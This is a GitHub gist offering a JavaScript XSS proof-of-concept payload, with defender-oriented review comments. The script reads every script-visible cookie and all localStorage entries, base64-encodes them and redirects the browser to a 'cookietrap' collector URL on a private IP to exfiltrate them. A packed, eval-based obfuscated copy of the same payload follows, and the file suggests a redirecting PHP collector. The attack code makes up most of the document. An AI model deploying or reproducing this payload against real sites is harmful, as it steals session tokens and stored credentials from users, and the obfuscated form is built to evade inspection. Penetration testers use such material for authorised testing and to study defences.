@nicovillanueva
Last active November 9, 2022 17:38
JS script for doing XSS POCs
// XSS proof-of-concept: gathers what an injected script can read in the page's
// origin (script-visible cookies and localStorage), shows it to the user, and
// then navigates the browser to a collector URL carrying the data.
//
// Collector side: it must base64-decode the 'payload' query parameter.
// Suggestion: the PHP script could redirect back to the user's referer, such as:
//   header("Location: " . $_SERVER['HTTP_REFERER']);
// NOTE(review): Referer is client-supplied and may be absent; a collector that
// copies it into Location without validation is itself an open redirect.
//
// What this demonstrates for the defender:
//  - cookies set with HttpOnly never appear in document.cookie, so they are
//    missing from this dump; session cookies without that flag are not;
//  - localStorage has no such flag: every script running in the origin can
//    read all of it, so tokens kept there are exposed by any XSS;
//  - base64 is an encoding, not encryption, and the collector URL is plain
//    http, so the navigation and its long 'payload' parameter are visible to
//    proxies and web logs.
// All names below are assigned without var/let/const, so they end up as
// globals on the page.
collector = "http://192.168.40.6/cookietrap/trap.php?payload=";

// One "- <cookie>" line per entry of document.cookie.
c = (function () {
  ret = "";
  document.cookie.split(";").forEach(function (entry) {
    ret += "- " + entry + "\n";
  });
  return ret;
})();

// One "Key: ... / Value: ..." paragraph per localStorage item.
ls = (function () {
  locStor = "";
  for (var idx = 0; idx < localStorage.length; idx++) {
    var itemKey = localStorage.key(idx);
    locStor += "Key: " + itemKey + "\nValue: " + localStorage.getItem(itemKey) + "\n\n";
  }
  return locStor;
})();

// Plain-text report, then its base64 form for the query string.
payload = "Cookies: \n" + c + "\nLocalStorage: \n" + ls;
enc = btoa(payload);

// The three dialogs make the impact visible to whoever views the PoC.
alert("Yar cookies are: \n" + c);
alert("And your LocalStorage: \n" + ls);
alert("And now I have them.");

// Top-level navigation away from the page; the data travels in the URL.
document.location = collector + enc;
// OBFUSCATED
// Packed form of a script; judging by its word table it appears to be the same
// script as the readable version (verify by unpacking offline before relying
// on that). The wrapper is the `eval(function(p,a,c,k,e,d){...})` shape: `p`
// is the template with short tokens, `k` is the '|'-separated word list, and
// the loop substitutes each token back before the result is handed to eval().
// NOTE(review): this is string substitution, not encryption. The identifiers
// and URL fragments ('localStorage', 'cookie', 'btoa', 'cookietrap', 'trap',
// 'php', '192', '168', '40') sit in clear text in the word list, and the
// `eval(function(p,a,c,k,e,d)` prefix itself is a fixed, searchable string, so
// content inspection can match on either.
// NOTE(review): eval() of a generated string; a Content-Security-Policy
// without 'unsafe-eval' stops this line from executing.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h="E://J.H.m.6/x/t.u?3=";c=e(){5="";j(d i=0;i<8.f.g(";").9;i++){5+=("- "+8.f.g(";")[i]+"\\n")}a 5}();2=e(){7="";j(d i=0;i<1.9;i++){7+=("w: "+1.k(i)+"\\y: "+1.F(1.k(i))+"\\n\\n")}a 7}();3="z: \\n"+c+"\\A: \\n"+2;b=B(3);4("p C D: \\n"+c);4("l q o: \\n"+2);4("l v I s r.");8.G=h+b;',46,46,'|localStorage|ls|payload|alert|ret||locStor|document|length|return|enc||var|function|cookie|split|collector||for|key|And|40||LocalStorage|Yar|your|them|have|trap|php|now|Key|cookietrap|nValue|Cookies|nLocalStorage|btoa|cookies|are|http|getItem|location|168||192'.split('|'),0,{}))